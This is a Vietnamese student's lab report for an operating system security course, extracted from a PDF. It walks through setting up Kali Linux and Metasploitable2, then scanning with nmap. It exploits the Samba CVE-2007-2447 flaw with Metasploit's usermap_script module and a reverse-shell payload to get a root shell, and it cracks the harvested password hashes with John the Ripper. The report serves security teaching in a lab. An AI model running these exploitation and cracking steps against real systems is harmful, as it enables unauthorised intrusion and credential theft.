- etasploitable2 là một máy ảo VMWare được tích hợp nhiều dịch vụ chứa các lỗi bảo mật đã biết cho phép khai thác kiểm soát hệ thống từ xa phục vụ học tập.. Danh sách các lỗ hổng và hướn
Trang 1HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG
KHOA AN TOÀN THÔNG TIN
Môn: An toàn hệ điều hành
Bài thực hành 1
Họ và tên sinh viên: Nguyễn Xuân Bắc
Mã số sinh viên: B21DCAT040
Họ và tên giảng viên: Hoàng Xuân Dậu
Hà Nội 3/2024 (tháng/năm)
Trang 2Table of Contents
I Mục đích 1
II Lý thuyết 1
A Công cụ Metasploit 1
1 Giới thiệu 1
2 Thành phần 1
B Dịch vụ samba 1
1 Giới thiệu: 1
2 Tính năng chính: 1
3 Lợi ích: 2
4 Ứng dụng: 2
III Thực hành 2
A Chuẩn bị 2
1 Cài đặt máy ảo Kali Linux 2
2 Tải và cài Metasploitable 13
3 Tạo một người dùng mới trên máy ảo: 15
o Tạo mới người dùng cho mình: sudo useradd bacnx040 , trong đó ghép tên không dấu + chữ cái đầu của họ đệm và 3 số mã sinh viên 15
o Tạo mật khẩu cho người dùng: sudo passwd bacnx040 , nhập mật khẩu mới 2 lần (lưu ý đặt mật khẩu đơn giản và ngắn để có thể crack được) 15
4 Đặt lại tên máy chứa lỗi là Mã SV+Họ và tên → tên máy là B21DCAT040-Bac-Meta Khởi động lại máy victim để máy nhận tên mới 15
B 16
1 Quét máy victim Metasploitable2 tìm các lỗ hổng tồn tại 16
2 Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root 20
2
Trang 32 Thành phần
- Metasploit có hai giao diện người dùng: Console và Web interface
- Môi trường trong Metasploit được chia thành hai loại: Global Enviroment và Temporary Enviroment
+ Global Enviroment được sử dụng để cấu hình các tùy chọn chung cho tất cả các module khai thác
+ Temporary Enviroment được sử dụng để cấu hình các tùy chọn cho module khai thác đang được sử dụng
B Dịch vụ samba
1 Giới thiệu:
- Samba là một phần mềm mã nguồn mở cho phép chia sẻ tài nguyên (file, máy
in, ) giữa các máy tính trong mạng Samba hoạt động dựa trên giao thức SMB/CIFS (Server Message Block/Common Internet File System) được Microsoftphát triển
2 Tính năng chính:
- Chia sẻ file và máy in giữa các máy tính Windows, Linux và macOS
- Xác thực người dùng và quản lý quyền truy cập
- Hỗ trợ nhiều giao thức mạng như SMB/CIFS, NetBIOS, WINS, LDAP
- Dễ dàng cài đặt và cấu hình
Trang 4- Hỗ trợ nhiều tính năng nâng cao như: o Replication: Sao chép dữ liệu giữa các máy chủ Samba o Failover: Chuyển đổi dự phòng giữa các máy chủ Samba o Clustering: Tạo cụm máy chủ Samba để tăng hiệu suất và khả năng sẵn sàng
3 Lợi ích:
- Tăng khả năng tương thích giữa các hệ điều hành khác nhau
- Cung cấp giải pháp chia sẻ tài nguyên hiệu quả và an toàn
- Giảm chi phí quản lý mạng
- etasploitable2 là một máy ảo VMWare được tích hợp nhiều dịch vụ chứa các lỗi bảo mật đã biết cho phép khai thác kiểm soát hệ thống từ xa phục vụ học tập Danh sách các lỗ hổng và hướng dẫn khai thác có thể tìm tại:
https://www.hackingarticles.in/comprehensive-guide-on-metasploitable- 2/ o Lỗ hổng là lỗ hổng bảo mật CVE-2007-2447 trên dịch vụ chia sẻ file SMB (Samba) với các phiên bản Samba 3.0.0 đến 3.0.25rc3 có thể cho phép thực thi mã từ xa Chi tiết về lỗ hổng này có thể tìm tại: https://nvd.nist.gov/vuln/detail/CVE- 2007-2447
III Thực hành
A Chuẩn bị
- Cài đặt Kali Linux (nếu chưa cài đặt) trên 1 máy ảo (hoặc máy thực)
1 Cài đặt máy ảo Kali Linux
o Ta nạp file ISO của Kali Linux vào VMware
2
Trang 5Ta chọn phiên bản Linux
Trang 6o Ta đặt tên cho máy ảo và chọn vị trí tệp lưu
o Ta chọn finish để hoàn hành việc tạo máy ảo
4
Trang 7o Ta chọn Install
o Chọn ngôn ngữ phù hợp
Trang 8o Chọn quốc gia hoặc khu vực
6
Trang 9o Ta để tên máy Kali Linux thành dạng Mã SV-Tên-Kali Bắc-Kali).
Trang 10(B21DCAT040-o Ta tạo tài khoản người dùng
8
Trang 14o Ta đợi download hoàn tất và tiến hành đăng nhập
12
Trang 15o Kết quả thu được là ta đã cài đặt thành công máy ảo Kali-Linux
2 Tải và cài Metasploitable
o Ta tải Metasploitable và giải nén ra Ta thu được thư mục chứa file cài đặt
Trang 16Ta mở file cài đặt(đuôi vmdk) bằng phần mềm VMware
o Ta đăng nhập vào bằng tài khoản đăng nhập vào hệ thống là msfadmin / msfadmin
14
Trang 173 Tạo một người dùng mới trên máy ảo:
o Tạo mới người dùng cho mình: sudo useradd bacnx040 , trong đó ghép tên không dấu + chữ cái đầu của họ đệm và 3 số mã sinh viên
o Tạo mật khẩu cho người dùng: sudo passwd bacnx040 , nhập mật khẩu mới 2 lần (lưu ý đặt mật khẩu đơn giản và ngắn để có thể crack được)
4 Đặt lại tên máy chứa lỗi là Mã SV+Họ và tên → tên máy là B21DCAT040-Bac-Meta Khởi động lại máy victim để máy nhận tên mới
Trang 181 Quét máy victim Metasploitable2 tìm các lỗ hổng tồn tại
o Ta kiểm tra ip của máy Kali
o Kiểm tra ip của máy Meta
16
Trang 19Ta ping thử từ máy Meta sang máy Kali
o Ta ping từ máy Kali sang Meta
- Sử dụng công cụ nmap để rà quét các lỗ hổng tồn tại trên máy chạy
Metasploitable2:
Trang 20o Quét cổng dịch vụ netbios-ssn cổng 139: nmap script vuln -p139 192.168.232.148
o Quét cổng dịch vụ microsoft-ds cổng 445: nmap script vuln -p445 192.168.232.148
18
Trang 21o Khởi động Metasploit
o Khai báo sử dụng mô đun tấn công:
msf > use auxiliary/scanner/smb/smb_version
Trang 22o Đặt địa chỉ IP máy victim: msf > set RHOST <ip_victim> và thực thi tấn công: msf > exploit
- Kết quả ta thu được phiên bản của Samba là Unix(Samba 3.0.20-Debian)
2 Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root
o Khai báo sử dụng mô đun tấn công: msf >
use exploit/multi/samba/usermap_script
20
Trang 23- Đặt địa chỉ IP máy victim: msf > set RHOST 192.168.232.148
- Chọn payload cho thực thi (mở shell): msf > set payload cmd/unix/reverse
- Đặt 445 là cổng truy cập máy victim: msf > set RPORT 445
Trang 24- Thực thi tấn công: msf > exploit
- Ta có thể thực hiện bất cứ lệnh shell nào trên máy victim
- Chạy các lệnh để đọc tên người dùng và máy đang truy cập:
Trang 25- Kết quả ta thu được tên người dùng và mật khẩu băm :
- Ta chạy thử lệnh: john show password
- Kết quả là chưa có mật khẩu nào bị bẻ khóa
Trang 26- Ta dùng lệnh: Join password –wordlist=“password” để tìm phương thức mã hóa tài khoản và mật khẩu
Kết quả ta thu được là thuật toán mã hóa md5
- Ta dùng lệnh: Join –format=md5crypt-long password để lấy tài khoản và mật khẩu
Ta đã thu được tài khoản là bacnx040 và mật khẩu là 1
24